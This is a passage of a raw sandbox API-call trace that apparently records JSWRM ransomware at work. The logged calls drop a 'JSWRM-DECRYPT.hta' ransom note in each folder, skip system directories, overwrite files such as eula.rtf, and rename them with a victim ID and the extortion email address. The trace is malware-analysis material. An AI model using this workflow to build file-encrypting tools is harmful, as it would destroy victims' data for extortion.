dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0058.566] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x23da48 [0058.566] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23bc78 | out: hHeap=0x1e0000) returned 1 [0058.566] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0058.566] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x5e) returned 0x232ef0 [0058.566] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0058.566] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\JSWRM-DECRYPT.hta" (normalized: "c:\\588bce7c90097ed212\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x44c [0058.567] SetFilePointer (in: hFile=0x44c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0058.567] WriteFile (in: hFile=0x44c, lpBuffer=0x345c9a8*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345c974, lpOverlapped=0x0 | out: lpBuffer=0x345c9a8*, lpNumberOfBytesWritten=0x345c974*=0x230c, lpOverlapped=0x0) returned 1 [0058.568] CloseHandle (hObject=0x44c) returned 1 [0058.568] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232ef0 | out: hHeap=0x1e0000) returned 1 [0058.568] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23da48 | out: hHeap=0x1e0000) returned 1 [0058.568] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0058.568] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0058.568] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0058.568] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d458 [0058.568] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0058.568] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x5e) returned 0x233160 [0058.568] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0058.568] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\JSWRM-DECRYPT.hta" (normalized: "c:\\588bce7c90097ed212\\jswrm-decrypt.hta")) returned 0x20 [0058.569] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233160 | out: hHeap=0x1e0000) returned 1 [0058.569] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d458 | out: hHeap=0x1e0000) returned 1 [0058.569] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0058.569] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\*.*", lpFindFileData=0x345f6c8 | out: lpFindFileData=0x345f6c8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf257ded5, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf74cd515, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0x1991a791, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfffffffe, dwReserved1=0x345f828, cFileName=".", cAlternateFileName="")) returned 0x2321c0 [0058.569] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0058.569] FindNextFileW (in: hFindFile=0x2321c0, lpFindFileData=0x345f6c8 | out: lpFindFileData=0x345f6c8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf257ded5, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf74cd515, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0x1991a791, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfffffffe, dwReserved1=0x345f828, cFileName="..", cAlternateFileName="")) returned 1 [0058.569] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0058.569] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0058.569] FindNextFileW (in: hFindFile=0x2321c0, lpFindFileData=0x345f6c8 | out: lpFindFileData=0x345f6c8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfffffffe, dwReserved1=0x345f828, cFileName="1025", cAlternateFileName="")) returned 1 [0058.569] lstrcmpiW (lpString1="1025", lpString2=".") returned 1 [0058.569] lstrcmpiW (lpString1="1025", lpString2="..") returned 1 [0058.569] lstrcmpiW (lpString1="1025", lpString2="...") returned 1 [0058.570] lstrcmpiW (lpString1="1025", lpString2="windows") returned -1 [0058.570] lstrcmpiW (lpString1="1025", lpString2="recovery") returned -1 [0058.570] lstrcmpiW (lpString1="1025", lpString2="perflogs") returned -1 [0058.570] lstrcmpiW (lpString1="1025", lpString2="documents and settings") returned -1 [0058.570] lstrcmpiW (lpString1="1025", lpString2="$RECYCLE.BIN") returned 1 [0058.570] lstrcmpiW (lpString1="1025", lpString2="system volume information") returned -1 [0058.570] lstrcmpiW (lpString1="1025", lpString2="msocache") returned -1 [0058.570] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dec0 [0058.570] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0058.570] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0058.570] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c538 [0058.570] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x76) returned 0x226530 [0058.570] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c538 | out: hHeap=0x1e0000) returned 1 [0058.570] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1025\\JSWRM-DECRYPT.hta" (normalized: "c:\\588bce7c90097ed212\\1025\\jswrm-decrypt.hta")) returned 0xffffffff [0058.570] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x226530 | out: hHeap=0x1e0000) returned 1 [0058.571] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0058.571] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345c52c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0058.571] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0058.571] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x23cc80 [0058.571] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0058.571] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x2471a8 [0058.571] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cc80 | out: hHeap=0x1e0000) returned 1 [0058.571] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c488 [0058.571] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x76) returned 0x2265b0 [0058.571] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c488 | out: hHeap=0x1e0000) returned 1 [0058.571] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1025\\JSWRM-DECRYPT.hta" (normalized: "c:\\588bce7c90097ed212\\1025\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x450 [0058.575] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0058.575] WriteFile (in: hFile=0x450, lpBuffer=0x345c640*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345c60c, lpOverlapped=0x0 | out: lpBuffer=0x345c640*, lpNumberOfBytesWritten=0x345c60c*=0x230c, lpOverlapped=0x0) returned 1 [0058.576] CloseHandle (hObject=0x450) returned 1 [0058.576] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2265b0 | out: hHeap=0x1e0000) returned 1 [0058.576] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471a8 | out: hHeap=0x1e0000) returned 1 [0058.576] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0058.576] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0058.576] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e268 [0058.576] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e418 [0058.576] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c220 [0058.576] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x76) returned 0x2268b0 [0058.576] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c220 | out: hHeap=0x1e0000) returned 1 [0058.576] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1025\\JSWRM-DECRYPT.hta" (normalized: "c:\\588bce7c90097ed212\\1025\\jswrm-decrypt.hta")) returned 0x20 [0058.577] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2268b0 | out: hHeap=0x1e0000) returned 1 [0058.577] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e418 | out: hHeap=0x1e0000) returned 1 [0058.577] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e418 [0058.577] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1025\\*.*", lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37db23a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0x1993fa21, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x20e44c, cFileName=".", cAlternateFileName="")) returned 0x231c80 [0058.577] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0058.577] FindNextFileW (in: hFindFile=0x231c80, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37db23a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0x1993fa21, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x20e44c, cFileName="..", cAlternateFileName="")) returned 1 [0058.577] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0058.577] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0058.577] FindNextFileW (in: hFindFile=0x231c80, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0x1d8f, dwReserved0=0x60002, dwReserved1=0x20e44c, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0058.577] lstrcmpiW (lpString1="eula.rtf", lpString2=".") returned 1 [0058.577] lstrcmpiW (lpString1="eula.rtf", lpString2="..") returned 1 [0058.577] lstrcmpiW (lpString1="eula.rtf", lpString2="...") returned 1 [0058.577] lstrcmpiW (lpString1="eula.rtf", lpString2="windows") returned -1 [0058.577] lstrcmpiW (lpString1="eula.rtf", lpString2="recovery") returned -1 [0058.577] lstrcmpiW (lpString1="eula.rtf", lpString2="perflogs") returned -1 [0058.577] lstrcmpiW (lpString1="eula.rtf", lpString2="documents and settings") returned 1 [0058.577] lstrcmpiW (lpString1="eula.rtf", lpString2="$RECYCLE.BIN") returned 1 [0058.577] lstrcmpiW (lpString1="eula.rtf", lpString2="system volume information") returned -1 [0058.577] lstrcmpiW (lpString1="eula.rtf", lpString2="msocache") returned -1 [0058.577] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0058.577] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="eula.rtf", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0058.577] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="eula.rtf", cchWideChar=8, lpMultiByteStr=0x345f610, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eula.rtf", lpUsedDefaultChar=0x0) returned 8 [0058.577] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0058.577] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0058.577] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="eula.rtf", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0058.577] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="eula.rtf", cchWideChar=8, lpMultiByteStr=0x345f5e0, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eula.rtf", lpUsedDefaultChar=0x0) returned 8 [0058.577] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0058.578] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c118 [0058.578] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e418 | out: hHeap=0x1e0000) returned 1 [0058.578] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0058.578] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f334, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0058.578] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bda8 [0058.578] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1025\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1025\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3d4 [0058.579] GetFileSizeEx (in: hFile=0x3d4, lpFileSize=0x345f2c8 | out: lpFileSize=0x345f2c8*=7567) returned 1 [0058.579] SetFilePointer (in: hFile=0x3d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0058.579] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1d80) returned 0x23dc88 [0058.579] ReadFile (in: hFile=0x3d4, lpBuffer=0x23dc88, nNumberOfBytesToRead=0x1d80, lpNumberOfBytesRead=0x345f2d4, lpOverlapped=0x0 | out: lpBuffer=0x23dc88*, lpNumberOfBytesRead=0x345f2d4*=0x1d80, lpOverlapped=0x0) returned 1 [0058.581] SetFilePointer (in: hFile=0x3d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0058.581] WriteFile (in: hFile=0x3d4, lpBuffer=0x23dc88*, nNumberOfBytesToWrite=0x1d80, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x23dc88*, lpNumberOfBytesWritten=0x345f2d0*=0x1d80, lpOverlapped=0x0) returned 1 [0058.582] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dc88 | out: hHeap=0x1e0000) returned 1 [0058.582] CloseHandle (hObject=0x3d4) returned 1 [0058.582] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c6f0 [0058.583] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0058.583] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d4c8 [0058.583] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d4c8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0058.583] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d458 [0058.583] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d4c8 | out: hHeap=0x1e0000) returned 1 [0058.583] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0058.583] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3d8 [0058.583] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3d8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0058.583] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3d8 | out: hHeap=0x1e0000) returned 1 [0058.583] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232d50 [0058.583] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x8e) returned 0x23b400 [0058.583] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232d50 | out: hHeap=0x1e0000) returned 1 [0058.583] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd4) returned 0x1fc808 [0058.583] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0058.583] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d458 | out: hHeap=0x1e0000) returned 1 [0058.583] MoveFileW (lpExistingFileName="C:\\588bce7c90097ed212\\1025\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1025\\eula.rtf"), lpNewFileName="C:\\588bce7c90097ed212\\1025\\eula.rtf.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\588bce7c90097ed212\\1025\\eula.rtf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0058.583] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0058.583] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c6f0 | out: hHeap=0x1e0000) returned 1 [0058.583] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bda8 | out: hHeap=0x1e0000) returned 1 [0058.584] FindNextFileW (in: hFindFile=0x231c80, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1991a791, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x1991a791, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x1993fa21, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x60002, dwReserved1=0x20e44c, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0058.584] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0058.584] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0058.584] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0058.584] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0058.584] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0058.584] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0058.584] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0058.584] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0058.584] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0058.584] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0058.584] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d458 [0058.584] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0058.584] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241380 [0058.584] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241380, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0058.584] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d458 | out: hHeap=0x1e0000) returned 1 [0058.584] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d458 [0058.584] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0058.584] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413d0 [0058.584] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2413d0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0058.584] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d458 | out: hHeap=0x1e0000) returned 1 [0058.584] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233230 [0058.584] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c118 | out: hHeap=0x1e0000) returned 1 [0058.584] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413d0 | out: hHeap=0x1e0000) returned 1 [0058.584] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241380 | out: hHeap=0x1e0000) returned 1 [0058.584] FindNextFileW (in: hFindFile=0x231c80, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x121e6, dwReserved0=0x60002, dwReserved1=0x20e44c, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0058.584] lstrcmpiW (lpString1="LocalizedData.xml", lpString2=".") returned 1 [0058.584] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="..") returned 1 [0058.584] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="...") returned 1 [0058.584] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="windows") returned -1 [0058.584] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="recovery") returned -1 [0058.584] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="perflogs") returned -1 [0058.584] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="documents and settings") returned 1 [0058.585] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="$RECYCLE.BIN") returned 1 [0058.585] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="system volume information") returned -1 [0058.585] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="msocache") returned -1 [0058.585] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d490 [0058.585] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LocalizedData.xml", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0058.585] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0058.585] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LocalizedData.xml", cchWideChar=17, lpMultiByteStr=0x241330, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LocalizedData.xml", lpUsedDefaultChar=0x0) returned 17 [0058.585] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d490 | out: hHeap=0x1e0000) returned 1 [0058.585] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d4c8 [0058.585] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LocalizedData.xml", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0058.585] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0058.585] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LocalizedData.xml", cchWideChar=17, lpMultiByteStr=0x2410d8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LocalizedData.xml", lpUsedDefaultChar=0x0) returned 17 [0058.585] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d4c8 | out: hHeap=0x1e0000) returned 1 [0058.585] RtlAllocateHeap 